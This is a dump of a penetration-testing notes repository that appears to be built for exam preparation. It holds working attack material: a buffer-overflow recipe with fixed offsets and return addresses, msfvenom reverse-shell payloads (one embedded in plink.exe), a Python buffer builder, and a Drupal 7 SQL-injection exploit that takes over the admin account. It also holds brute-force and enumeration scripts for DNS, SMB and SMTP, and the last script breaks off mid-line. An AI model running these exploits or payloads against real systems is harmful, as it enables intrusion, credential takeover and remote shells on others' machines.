├── Buffer_overflow
│   └── info.txt
├── ENUMERATION
│   ├── CMS
│   │   ├── Drupal
│   │   │   ├── 34984.py
│   │   │   ├── CVE2014-3704.py
│   │   │   ├── drupal-finduser.sh
│   │   │   └── drupalbrute.py
│   │   └── cms-explorer-1.0
│   │       ├── LICENSE.txt
│   │       ├── LW2.pm
│   │       ├── README.txt
│   │       ├── cms-explorer.pl
│   │       ├── drupal_plugins.txt
│   │       ├── drupal_themes.txt
│   │       ├── joomla_plugins.txt
│   │       ├── joomla_themes.txt
│   │       ├── wp_plugins.txt
│   │       └── wp_themes.txt
│   ├── DNS
│   │   ├── DNS-subdomain-bruteforce.sh
│   │   └── DNS-zone-transfer-check.sh
│   ├── FINGER
│   │   └── finger_enum_user.sh
│   ├── FTP
│   │   └── ftp_commaands
│   ├── NFS-RPC
│   │   └── commands.txt
│   ├── SMB
│   │   ├── SMB-check-vulns.rb
│   │   └── commands.txt
│   ├── SMTP
│   │   ├── SMTP-enum.rb
│   │   ├── smtp-vrfy-from-file
│   │   └── smtp_commands.txt
│   ├── SNMP
│   │   ├── commands.txt
│   │   └── snmp-enumeration-snmpwalk-from-list.sh
│   ├── SQL
│   │   └── Microsoft_SQL.txt
│   ├── SSH
│   │   └── commands.txt
│   ├── TELNET
│   │   └── telnet_commands.txt
│   ├── discover-master
│   │   ├── .gitignore
│   │   ├── LICENCE
│   │   ├── README.md
│   │   ├── alias
│   │   ├── crack-wifi.sh
│   │   ├── discover.sh
│   │   ├── misc
│   │   │   ├── compare-sites.sh
│   │   │   ├── crawl.sh
│   │   │   ├── dns-forward.sh
│   │   │   ├── dns-reverse.sh
│   │   │   ├── dns-transfer.sh
│   │   │   ├── enum-linux.sh
│   │   │   ├── enum-solaris.sh
│   │   │   ├── netblocks.sh
│   │   │   ├── netblocks.txt
│   │   │   ├── nse.sh
│   │   │   ├── ping-sweep.sh
│   │   │   └── python
│   │   │       ├── discover.py
│   │   │       ├── ex1.py
│   │   │       ├── ex2.py
│   │   │       ├── multitabs.py
│   │   │       ├── notes.txt
│   │   │       ├── recon.py
│   │   │       └── test.py
│   │   ├── mods
│   │   │   ├── goog-mail.py
│   │   │   └── goohost.sh
│   │   ├── notes
│   │   │   ├── MSSQL Injection Cheat Sheet.pdf
│   │   │   ├── bash.txt
│   │   │   ├── buffer-overflows.txt
│   │   │   ├── burp.txt
│   │   │   ├── databases.txt
│   │   │   ├── dns.txt
│   │   │   ├── exploits.txt
│   │   │   ├── git.txt
│   │   │   ├── hack3rcon
│   │   │   │   ├── main.sh
│   │   │   │   ├── nmap.sh
│   │   │   │   ├── open-list.sh
│   │   │   │   ├── recon-domain.sh
│   │   │   │   ├── recon-people.sh
│   │   │   │   └── robots.sh
│   │   │   ├── insecure-protocols.txt
│   │   │   ├── kali.txt
│   │   │   ├── linux.txt
│   │   │   ├── maltego.txt
│   │   │   ├── metasploit
│   │   │   │   ├── Analysis of MSF Relative to PTES.pdf
│   │   │   │   └── metasploit.txt
│   │   │   ├── misc.txt
│   │   │   ├── mobile.txt
│   │   │   ├── nexpose.txt
│   │   │   ├── oracle.txt
│   │   │   ├── passwords.txt
│   │   │   ├── pwk.txt
│   │   │   ├── python.txt
│   │   │   ├── smtp.txt
│   │   │   ├── snmp.txt
│   │   │   ├── sqli.txt
│   │   │   ├── ssl.txt
│   │   │   ├── unix.txt
│   │   │   ├── web-apps.txt
│   │   │   └── windows.txt
│   │   ├── parsers
│   │   │   ├── parse-burp.py
│   │   │   ├── parse-nessus-feed.py
│   │   │   ├── parse-nessus.py
│   │   │   ├── parse-nexpose.py
│   │   │   ├── parse-nippar.py
│   │   │   ├── parse-nmap.py
│   │   │   ├── parse-qualys.py
│   │   │   └── utfdictcsv.py
│   │   ├── report
│   │   │   ├── css
│   │   │   │   ├── defaults.css
│   │   │   │   ├── ie.css
│   │   │   │   └── style.css
│   │   │   ├── data
│   │   │   │   ├── active-recon.htm
│   │   │   │   ├── doc.htm
│   │   │   │   ├── emails.htm
│   │   │   │   ├── hosts.htm
│   │   │   │   ├── loadbalancing.htm
│   │   │   │   ├── names.htm
│   │   │   │   ├── passive-recon.htm
│   │   │   │   ├── pdf.htm
│   │   │   │   ├── ppt.htm
│   │   │   │   ├── records.htm
│   │   │   │   ├── squatting.htm
│   │   │   │   ├── subdomains.htm
│   │   │   │   ├── traceroute.htm
│   │   │   │   ├── txt.htm
│   │   │   │   ├── waf.htm
│   │   │   │   ├── whatweb.htm
│   │   │   │   ├── whois-domain.htm
│   │   │   │   ├── whois-ip.htm
│   │   │   │   ├── xls.htm
│   │   │   │   └── zonetransfer.htm
│   │   │   ├── images
│   │   │   │   ├── icons
│   │   │   │   │   ├── blue.png
│   │   │   │   │   ├── green.png
│   │   │   │   │   ├── red.png
│   │   │   │   │   └── yellow.png
│   │   │   │   └── logo.png
│   │   │   ├── index.htm
│   │   │   └── pages
│   │   │       ├── active-recon.htm
│   │   │       ├── black-listed.htm
│   │   │       ├── config.htm
│   │   │       ├── doc.htm
│   │   │       ├── emails.htm
│   │   │       ├── hosts.htm
│   │   │       ├── loadbalancing.htm
│   │   │       ├── names.htm
│   │   │       ├── netcraft.htm
│   │   │       ├── passive-recon.htm
│   │   │       ├── pdf.htm
│   │   │       ├── ppt.htm
│   │   │       ├── records.htm
│   │   │       ├── squatting.htm
│   │   │       ├── subdomains.htm
│   │   │       ├── traceroute.htm
│   │   │       ├── txt.htm
│   │   │       ├── waf.htm
│   │   │       ├── whatweb.htm
│   │   │       ├── whois-domain.htm
│   │   │       ├── whois-ip.htm
│   │   │       ├── xls.htm
│   │   │       └── zonetransfer.htm
│   │   ├── resource
│   │   │   ├── adobe.rc
│   │   │   ├── afp.rc
│   │   │   ├── backdoor.rc
│   │   │   ├── chargen.rc
│   │   │   ├── citrix.rc
│   │   │   ├── couchdb.rc
│   │   │   ├── db2-2.rc
│   │   │   ├── db2.rc
│   │   │   ├── dcerpc.rc
│   │   │   ├── dcerpc2.rc
│   │   │   ├── emc.rc
│   │   │   ├── emc2.rc
│   │   │   ├── finger.rc
│   │   │   ├── ftp.rc
│   │   │   ├── h323.rc
│   │   │   ├── http.rc
│   │   │   ├── imap.rc
│   │   │   ├── ipmi.rc
│   │   │   ├── lotus.rc
│   │   │   ├── misc.rc
│   │   │   ├── misc
│   │   │   │   ├── java.rc
│   │   │   │   ├── listener.rc
│   │   │   │   └── post.rc
│   │   │   ├── motorola.rc
│   │   │   ├── mssql.rc
│   │   │   ├── mysql.rc
│   │   │   ├── nessus.rc
│   │   │   ├── netbios.rc
│   │   │   ├── nfs.rc
│   │   │   ├── ntp.rc
│   │   │   ├── oracle.rc
│   │   │   ├── oracle2.rc
│   │   │   ├── oracle3.rc
│   │   │   ├── oracle4.rc
│   │   │   ├── pcanywhere.rc
│   │   │   ├── pcanywhere2.rc
│   │   │   ├── pop3.rc
│   │   │   ├── postgres.rc
│   │   │   ├── printers.rc
│   │   │   ├── rdp.rc
│   │   │   ├── recon-ng
│   │   │   │   ├── active.rc
│   │   │   │   ├── export.rc
│   │   │   │   └── passive.rc
│   │   │   ├── redis.rc
│   │   │   ├── rmi.rc
│   │   │   ├── rservices.rc
│   │   │   ├── rservices2.rc
│   │   │   ├── rservices3.rc
│   │   │   ├── scada.rc
│   │   │   ├── scada2.rc
│   │   │   ├── scada3.rc
│   │   │   ├── scada4.rc
│   │   │   ├── scada5.rc
│   │   │   ├── scada6.rc
│   │   │   ├── sip.rc
│   │   │   ├── sip2.rc
│   │   │   ├── smb.rc
│   │   │   ├── smtp.rc
│   │   │   ├── smtp2.rc
│   │   │   ├── snmp.rc
│   │   │   ├── ssh.rc
│   │   │   ├── telnet.rc
│   │   │   ├── telnet2.rc
│   │   │   ├── telnet3.rc
│   │   │   ├── tftp.rc
│   │   │   ├── tomcat.rc
│   │   │   ├── upnp.rc
│   │   │   ├── vmware.rc
│   │   │   ├── vmware2.rc
│   │   │   ├── vnc.rc
│   │   │   ├── vxworks.rc
│   │   │   ├── winrm.rc
│   │   │   └── x11.rc
│   │   ├── setup.sh
│   │   └── update.sh
│   └── enumeration
│       └── port scan & ping sweep
│           ├── fping_sweep
│           ├── nc-port-scanner.sh
│           ├── nmap-ARP-ping.sh
│           └── ping-sweep.sh
├── EXAM
│   ├── documentation-strategy
│   ├── pentest-reports
│   │   └── curated-list-pentest-reports
│   ├── tips
│   └── useful-notes
├── KNOWN-vulnerabilities
├── PRIVESC
│   ├── Linux
│   │   ├── LinEnum.sh
│   │   ├── PRIVESC_commands.txt
│   │   ├── netcat-and-crontab.sh
│   │   └── unix-privesc-check
│   ├── Windows
│   │   ├── Windows_commands
│   │   ├── accesschk.exe
│   │   ├── convert-python-exploits-to-exe
│   │   ├── sysinternals
│   │   │   ├── Eula.txt
│   │   │   ├── PsExec.exe
│   │   │   ├── PsGetsid.exe
│   │   │   ├── PsInfo.exe
│   │   │   ├── PsLoggedon.exe
│   │   │   ├── PsService.exe
│   │   │   ├── Pstools.chm
│   │   │   ├── psfile.exe
│   │   │   ├── pskill.exe
│   │   │   ├── pslist.exe
│   │   │   ├── psloglist.exe
│   │   │   ├── pspasswd.exe
│   │   │   ├── psping.exe
│   │   │   ├── psshutdown.exe
│   │   │   ├── pssuspend.exe
│   │   │   └── psversion.txt
│   │   └── useradd.c
│   └── ncat_transfr files.txt
├── Post-exploitation
│   └── windows.txt
├── Python_Servers
├── README.md
├── bruteforce & password_attacks
│   ├── Crack Ms Office _ 2007
│   │   ├── Makefile
│   │   ├── RC4-40-brute.c
│   │   ├── README.md
│   │   ├── rc4.c
│   │   ├── rc4.h
│   │   └── zip.hashes
│   ├── bruteforce_commands.txt
│   ├── office2john.py
│   │   ├── office2john.py
│   │   └── read-me
│   ├── pass-the-haash
│   ├── steghide-bruteforce-tool
│   └── zip-cracker.sh
├── gain access
│   └── shells
│       ├── php-reverse-shell-1.0
│       │   └── php-reverse-shell.php
│       └── spawn_shell_or break_out_of_jail.txt
├── persistence
│   └── persistence_windows.txt
└── whatis
    ├── RPC-definition
    └── SMB(CIFS)-definition

/Buffer_overflow/info.txt:
--------------------------------------------------------------------------------
Windows Buffer Overflows

- Controlling EIP

locate pattern_create
pattern_create.rb -l 2700
locate pattern_offset
pattern_offset.rb -q 39694438

- Verify exact location of EIP - [*] Exact match at offset 2606

buffer = "A" * 2606 + "B" * 4 + "C" * 90

- Check for "Bad Characters" - send every byte 0x01-0xFF after the return address, compare the stack dump with what was sent, drop the first byte that got mangled and send again; repeat until the whole range survives (0x00 is always excluded as a string terminator)

- Use Mona to find a module with no ASLR/Rebase and no SafeSEH (!mona modules); the address you pick from it must not contain any of the bad characters

- A plain JMP ESP into shellcode on the stack only works while DEP is off for the process; with DEP on, the stack is not executable and the return address has to start a ROP chain instead

- Use NASM to determine the HEX code for a JMP ESP instruction

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

JMP ESP
00000000  FFE4  jmp esp

- Run Mona from the Immunity Debugger command bar to find the FFE4 (JMP ESP) opcode in the chosen module

!mona find -s "\xff\xe4" -m slmfc.dll
found at 0x5f4a358f - flip around for little-endian format
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390

- MSFVenom to create payload

msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

- Final Payload with NOP slide

buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode

- Create a PE Reverse Shell
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe
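
The EIP-control steps above (read the offset out of a cyclic pattern, hunt bad characters by elimination, pack the JMP ESP address little-endian, assemble the final buffer) as one runnable helper. This is an added example, not part of the original notes and not Metasploit's own code: the pattern is the same Aa0Aa1... cycle that pattern_create.rb emits, the EIP value 0x39694438, offset 2606 and return address 0x5f4a358f are the ones quoted above, and the "observed" stack bytes in the demo are constructed to show how one mangled byte is spotted.

```python
#!/usr/bin/env python3
"""Helpers for the controlling-EIP / bad-character / return-address steps of the notes.

Added example, not from the original notes. The offsets and addresses below are
the ones quoted in the notes; the 'observed' bytes in the demo are constructed.
"""
import string
import struct


def msf_pattern(length):
    """Cyclic pattern identical to pattern_create.rb -l <length> (20280 unique bytes per cycle)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(eip_value, length=2700):
    """Offset of the four pattern bytes that landed in EIP (what pattern_offset.rb -q <hex> reports).

    The debugger shows EIP as one hex number, but the bytes sit in memory
    little-endian, so 0x39694438 is really the substring b'8Di9'.
    """
    needle = struct.pack("<I", eip_value)
    return msf_pattern(length).find(needle)


def badchar_probe(exclude=(0x00,)):
    """Every byte 0x00-0xFF except the ones already known to be bad; goes right after the return address."""
    return bytes(b for b in range(256) if b not in exclude)


def first_badchar(sent, observed):
    """Compare the probe with the bytes dumped from the stack; return the first mangled byte, or None.

    Process of elimination: add the returned byte to `exclude`, resend, repeat until None.
    """
    for s, o in zip(sent, observed):
        if s != o:
            return s
    return None


def build_exploit(offset, ret_addr, shellcode, nops=8, total=3000):
    """A*offset + little-endian return address + NOP sled + shellcode, padded to the crash length."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nops + shellcode
    if len(buf) > total:
        raise ValueError("payload does not fit in the overflow")
    return buf + b"C" * (total - len(buf))


if __name__ == "__main__":
    print("EIP 0x39694438 -> offset", pattern_offset(0x39694438))        # 2606, as in the notes
    probe = badchar_probe()
    # Constructed stack dump: the target turned 0x0a into 0x00 (a classic line-feed bad char).
    observed = probe.replace(b"\x0a", b"\x00")
    print("first bad char: 0x%02x" % first_badchar(probe, observed))    # 0x0a
    # 351 bytes of int3 stand in for the msfvenom output; swap in the real shellcode
    exploit = build_exploit(2606, 0x5F4A358F, b"\xcc" * 351)
    print(exploit[2606:2610])                                            # b'\x8f5J_' == \x8f\x35\x4a\x5f
```

Run it as-is to see the three numbers from the notes fall out; in a real session replace `observed` with the bytes copied out of the debugger after each crash, and keep adding what `first_badchar` returns to `exclude` until it returns None.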

- Create a PE Reverse Shell and Encode 9 times with Shikata_ga_nai
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe

- Create a PE reverse shell and embed it into an existing executable
msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

- Create a PE Reverse HTTPS shell
msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe

Linux Buffer Overflows

- Run Evan's Debugger against an app
edb --run /usr/games/crossfire/bin/crossfire

- ESP points just past the overwritten return address, so only a few bytes fit there; EAX points at the start of our buffer, so a short stub placed at ESP hops over the command prefix into the shellcode at the front of the buffer
add eax,12
jmp eax
83C00C  add eax,byte +0xc
FFE0    jmp eax

- Check for "Bad Characters" - process of elimination, run multiple times over 0x00-0xFF

- Find JMP ESP address
"\x97\x45\x13\x08"    # Found at address 08134597

- crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"

- msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

- Connect to the bind shell with netcat:
nc -v $ip 4444
--------------------------------------------------------------------------------
/ENUMERATION/CMS/Drupal/34984.py:
--------------------------------------------------------------------------------
#!/usr/bin/python
#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
#Python 2; needs drupalpass.py next to this file: https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py

import urllib2,sys
from drupalpass import DrupalHash

# the argument check has to run before the arguments are read (script name + 3 arguments = 4)
if len(sys.argv) != 4:
    print "usage: %s host username password" % sys.argv[0]
    print "e.g.:  %s http://nope.io admin wowsecure" % sys.argv[0]
    sys.exit(1)

host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Drupal 7 phpass-style ($S$ = SHA-512) hash of the chosen password; the settings string
# (algorithm, iteration count, salt) is the one from the original exploit
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
# the injection sits in the *key* of the name[] array: Drupal 7's expandArguments() put array keys
# into the query unescaped, so the UPDATE runs against uid 1 and the trailing # comments out the rest
post_data = "name[0%20;update+users+set+name%3d\'" \
+user \
+"'+,+pass+%3d+'" \
+hash[:55] \
+"'+where+uid+%3d+\'1\';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
# the injected statement breaks the login form's own query, which surfaces as this PHP warning when it worked
if "mb_strlen() expects parameter 1" in content:
    print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
else:
    print "No success indicator in the response; the target may be patched."
--------------------------------------------------------------------------------
/ENUMERATION/CMS/Drupal/drupal-finduser.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# find an existing user in Drupal 7: request every candidate name as a path and print the HTTP status
# next to it (edit the target address; rockyou is used as the candidate list)

while read -r line; do
    code=$(curl -s -o /dev/null -w "%{http_code}" "http://192.168.230.147/?q=$line")
    echo "$code $line"
done < /usr/share/wordlists/rockyou.txt
--------------------------------------------------------------------------------
/ENUMERATION/CMS/cms-explorer-1.0/joomla_themes.txt:
--------------------------------------------------------------------------------
templates/abc/
templates/atomic/
templates/b59-tpl8/
templates/beez/
templates/carbon_07/
templates/crub/
templates/dm_arrow_red/
templates/gk_eshoptrix_2/
templates/gk_gomuproject/
templates/gk_icki_sports/
templates/gk_musictop/
templates/ja_purity/
templates/ja_rochea/
templates/ja_teline_ii/
templates/joomlaport_metro/
templates/js_relevant/
templates/mynxx_j15/
templates/planets/
templates/planetsv2/
templates/rhuk_milkyway/
templates/rt_hivemind_j15/
templates/rt_mediamogul_essentials_j15/
templates/rt_nexus_j15/
templates/siteground-j15-14/
templates/siteground-j15-68/
templates/siteground-j15-86/
templates/siteground99/
templates/system/
templates/yoo_phoenix/
templates/yoo_waybeyond/
--------------------------------------------------------------------------------
/ENUMERATION/DNS/DNS-subdomain-bruteforce.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# bruteforce subdomains
# using /usr/share/wordlists/dnscan subdomains wordlists
# usage: ./DNS-subdomain-bruteforce.sh mydomain.com

domain=${1:?usage: $0 mydomain.com}

while read -r sub; do
    host "$sub.$domain"
    sleep 2
done < /usr/share/wordlists/dnscan/subdomains-100.txt | grep has | sort -u
--------------------------------------------------------------------------------
/ENUMERATION/DNS/DNS-zone-transfer-check.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Simple Zone Transfer Bash Script
# $1 is the first argument given after the bash script
# Check if argument was given, if not, print usage
# usage: ./file.sh domain.com

if [ -z "$1" ]; then
    echo "[*] Simple Zone transfer script"
    echo "[*] Usage: $0 domain.com"
    exit 0
fi

# if argument was given, identify the DNS servers for the domain.
# For each of these servers, attempt a zone transfer

for server in $(host -t ns "$1" | cut -d" " -f4); do
    host -l "$1" "$server" | grep "has address"
done
--------------------------------------------------------------------------------
/ENUMERATION/FINGER/finger_enum_user.sh:
--------------------------------------------------------------------------------
#!/bin/bash

# http://stackoverflow.com/questions/10929453/read-a-file-line-by-line-assigning-the-value-to-a-variable
display_usage()
{
    echo -e "\nScript takes a file with a list of users as argument"
    echo -e "Usage:\n./finger_enum_user.sh users.txt\n"
}

if [ $# -le 0 ]
then
    display_usage
    exit 1
fi

while IFS='' read -r line || [[ -n "$line" ]]; do

    echo "User : $line"
    finger "$line@192.168.1.33"
    echo -e "\n"

done < "$1"
--------------------------------------------------------------------------------
/ENUMERATION/FTP/ftp_commaands:
--------------------------------------------------------------------------------

nmap --script "ftp*" --script-args=unsafe=1 -p 20,21 10.11.1.8
--------------------------------------------------------------------------------
/ENUMERATION/NFS-RPC/commands.txt:
--------------------------------------------------------------------------------
nmap -sV --script "nfs-*" 192.168.44.133      // all nfs scripts (nfs-ls, nfs-showmount, nfs-statfs)
nmap -sV --script=nfs-ls 192.168.44.133
nmap -sV --script=rpcinfo 192.168.44.133      // same information as rpcinfo -p

rpcinfo -p 192.x.x.x
rpcclient -I 192.x.x.x

#mount NFS share
mount -t nfs -o nolock 192.168.1.72:/home/vulnix /tmp/mnt

#enumerate NFS shares
showmount -e 192.168.56.103

# If you see the NFS port open (nmap reports it as 2049/tcp nfs_acl), check /etc/exports on the target once you have a foothold
# /etc/exports: the access control list for filesystems which may be exported to NFS clients. See exports(5).

READ:
https://pentestlab.blog/tag/rpc/

See root squashing (an export with no_root_squash lets a root user on the client create root-owned SUID files on it):
https://haiderm.com/linux-privilege-escalation-using-weak-nfs-permissions/

--------------------------------------------------------------------------------
/ENUMERATION/SMB/SMB-check-vulns.rb:
--------------------------------------------------------------------------------
#!/usr/bin/ruby
# = smb-check-vulns has been removed from nmap; this iterates over all smb-vuln-* nse scripts to perhaps save some time - can extend this to any nse script later
# = add nse scripts to the @scripts array below

require 'optparse'

options = {:ports => nil, :ip => nil}

ARGV.push("-h") if ARGV.empty?
OptionParser.new do |opts|
  opts.banner = "Usage: smb-check-vulns.rb [options]"
  opts.on("-p", "--ports x,y", "Enter port or ports to scan, comma separated") do |port|
    options[:ports] = port
  end
  opts.on("-i", "--ip x,y", "ip address") do |ip|
    options[:ip] = ip
  end
  opts.on("-h", "--help", "Displays help") do
    puts opts
    exit
  end
end.parse!

@scripts = ["smb-vuln-conficker.nse", "smb-vuln-cve2009-3103.nse", "smb-vuln-ms06-025.nse", "smb-vuln-ms07-029.nse", "smb-vuln-ms08-067.nse", "smb-vuln-ms10-054.nse", "smb-vuln-ms10-061.nse", "smb-vuln-regsvc-dos.nse"]
@ports = options[:ports]
@ip = options[:ip]
@output = []
abort("both -i and -p are required (see -h)") if @ip.nil? || @ports.nil?

def check_vulns
  @scripts.each do |vuln|
    puts "[+] checking #{vuln}"
    @output << %x[nmap -v #{@ip} -p #{@ports} --script=#{vuln}]
  end
end

def format_output
  # print the "report for <host>" header and the VULNERABLE block of every script that flagged something
  @output.each do |result|
    next unless result.include?("VULNERABLE")
    puts "\n" + result.partition("VULNERABLE:").first.partition("report for ").last + result.partition("VULNERABLE:").last.partition("NSE: Script Post").first
  end
end

check_vulns
format_output
--------------------------------------------------------------------------------
/ENUMERATION/SMB/commands.txt:
--------------------------------------------------------------------------------
== SMB NETBIOS ==
enum4linux x.x.x.x
nmap -v -p 139,445 -oG smb.txt 192.168.11.200-254
nbtscan -r 192.168.11.0/24
nmblookup -A target

## SMB version
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_version) > run
[*] 192.168.31.142:139   - Host could not be identified: Unix (Samba 2.2.1a)

## SMB brute force
use auxiliary/scanner/smb/smb_login

## Existing users
msf > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 192.168.31.142
RHOSTS => 192.168.31.142
msf auxiliary(scanner/smb/smb_lookupsid) > run
[*] 192.168.31.142:139 - PIPE(LSARPC) LOCAL(MYGROUP - S-1-5-21-4157223341-3243572438-1405127623) DOMAIN(MYGROUP - )
[*] 192.168.31.142:139 - TYPE=0 NAME=Administrator rid=500

== NetBIOS NullSession enumeration ==
# This feature exists to allow unauthenticated machines to obtain browse lists from other
# Microsoft servers. Enum4linux is a wrapper built on top of smbclient, rpcclient, net and nmblookup
enum4linux -a 192.168.1.1

## upload file
smbclient //192.168.31.142/ADMIN$ -U "nobody"%"somepassword" -c "put 40280.py"

== NMAP SMB scripts ==
nmap --script "smb-*" --script-args=unsafe=1 192.168.10.55

# ls -lh /usr/share/nmap/scripts/smb*
smb-brute.nse
smb-enum-domains.nse
smb-enum-groups.nse
smb-enum-processes.nse
smb-enum-sessions.nse
smb-enum-shares.nse
smb-enum-users.nse
smb-flood.nse
smb-ls.nse
smb-mbenum.nse
smb-os-discovery.nse
smb-print-text.nse
smb-psexec.nse
smb-security-mode.nse
smb-server-stats.nse
smb-system-info.nse
smb-vuln-conficker.nse
smb-vuln-cve2009-3103.nse
smb-vuln-ms06-025.nse
smb-vuln-ms07-029.nse
smb-vuln-ms08-067.nse
smb-vuln-ms10-054.nse
smb-vuln-ms10-061.nse
smb-vuln-regsvc-dos.nse
smbv2-enabled.nse

rpcclient -U "" target                  // connect as blank user / nobody
smbmap -u "" -p "" -d MYGROUP -H 10.11.1.22

# list and connect to SMB shares from Linux (smbclient takes //server/share; backslashes would have to be doubled or quoted in bash)
smbclient -L WIN7 -I 192.168.13.218 -N                  // list shares over a null session
smbclient //WIN7/ADMIN$ -I 192.168.13.218 -U user
smbclient //WIN7/C$ -I 192.168.13.218 -U user
smbclient //WIN7/IPC$ -I 192.168.13.218 -N
smbclient //192.168.13.236/some-share -U root%root -W BOB
apt-get install cifs-utils
mount -t cifs //10.11.6.31/wwwroot -o username=xxx,password=xxx /tmp/smb/

# mount SMB share to a folder
mount -t auto --source //192.168.31.147/kathy --target /tmp/smb/ -o username=root,workgroup=WORKGROUP

# access SMB shares in Windows (via cmd)
C:\WINDOWS\system32> dir \\Computer_name\wwwroot
net use X: \\Computer_name\wwwroot /USER:DOMAIN\user /PERSISTENT:YES

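The notes above scan 139/445 with -oG smb.txt and then run enum4linux and the smb-* scripts by hand. The helper below, an added example that is not part of the original repository, parses that grepable output and prints the follow-up commands for every host that actually has 445 open, so a /24 worth of results does not have to be read by eye. The Host: lines embedded in it are constructed sample input in nmap's -oG format with made-up addresses, and the follow-up command strings are assumptions taken from the commands listed above.

```python
#!/usr/bin/env python3
"""Turn nmap grepable output (-oG) into per-port target lists for SMB enumeration.

Added example, not from the original notes. SAMPLE_OG is constructed input in the
format written by `nmap -v -p 139,445 -oG smb.txt 192.168.11.200-254`.
"""
import re
import sys

SAMPLE_OG = """\
# Nmap 7.70 scan initiated Sun Aug 20 00:01:02 2017 as: nmap -v -p 139,445 -oG smb.txt 192.168.11.200-254
Host: 192.168.11.201 ()\tStatus: Up
Host: 192.168.11.201 ()\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///
Host: 192.168.11.202 ()\tStatus: Up
Host: 192.168.11.202 ()\tPorts: 139/closed/tcp//netbios-ssn///, 445/filtered/tcp//microsoft-ds///
Host: 192.168.11.203 (fileserver.local)\tStatus: Up
Host: 192.168.11.203 (fileserver.local)\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///\tIgnored State: closed (0)
# Nmap done at Sun Aug 20 00:02:00 2017 -- 55 IP addresses (3 hosts up) scanned in 58.00 seconds
"""

# "Host: <ip> (<hostname>)<TAB>Ports: <entries>" ; further tab-separated fields (Ignored State, OS) may follow
HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\tPorts: (.*)$")


def parse_og(text):
    """Return {ip: {port: state}} for every Host: line that carries a Ports: field.

    Each port entry is port/state/proto/owner/service/rpcinfo/version/ (slash
    separated); only the first two fields matter here.
    """
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                              # comments and Status-only lines
        ip, _hostname, rest = m.groups()
        ports_field = rest.split("\t")[0]         # drop "Ignored State: ..." and friends
        for entry in ports_field.split(","):
            fields = entry.strip().split("/")
            if len(fields) < 3 or not fields[0].isdigit():
                continue
            hosts.setdefault(ip, {})[int(fields[0])] = fields[1]
    return hosts


def hosts_with_open(hosts, port):
    """IPs where `port` is open, sorted numerically so .9 comes before .10."""
    return sorted(
        (ip for ip, ports in hosts.items() if ports.get(port) == "open"),
        key=lambda ip: tuple(int(o) for o in ip.split(".")),
    )


def followup_commands(hosts):
    """One enumeration command per host that exposes SMB, ready to paste or pipe into a shell."""
    cmds = []
    for ip in hosts_with_open(hosts, 445):
        cmds.append(f"enum4linux -a {ip}")
        cmds.append(f"nmap -p 445 --script smb-os-discovery,smb-enum-shares {ip}")
    return cmds


if __name__ == "__main__":
    # ./parse-smb-og.py smb.txt   (falls back to the embedded sample when no file is given)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_OG
    print("\n".join(followup_commands(parse_og(text))))
```

Filtered and closed hosts are kept in the parsed dictionary (useful for spotting a firewall in front of 445) but never reach the command list; pipe the output into `sh` once you have checked it.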
--------------------------------------------------------------------------------
/ENUMERATION/SMTP/smtp-vrfy-from-file:
--------------------------------------------------------------------------------
#!/usr/bin/env python3
# VRFY every user from a wordlist against an SMTP server and flag the ones the server accepts
# usage: ./smtp-vrfy-from-file [host] [userlist]   (defaults below)

import socket
import sys

host = sys.argv[1] if len(sys.argv) > 1 else '192.168.44.133'
userlist = sys.argv[2] if len(sys.argv) > 2 else '/usr/share/wordlists/metasploit/unix_users.txt'

with open(userlist, 'r') as f:
    users = [u.strip() for u in f if u.strip()]

# create socket and connect to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 25))
# receive the banner
banner = s.recv(1024)
print(banner.decode(errors='replace').strip())

for user in users:
    # VRFY a user: 250/252 means known or accepted, 550 means unknown
    s.send(('VRFY ' + user + '\r\n').encode())
    result = s.recv(1024).decode(errors='replace').strip()
    print(result)
    if result.startswith(('250', '252')):
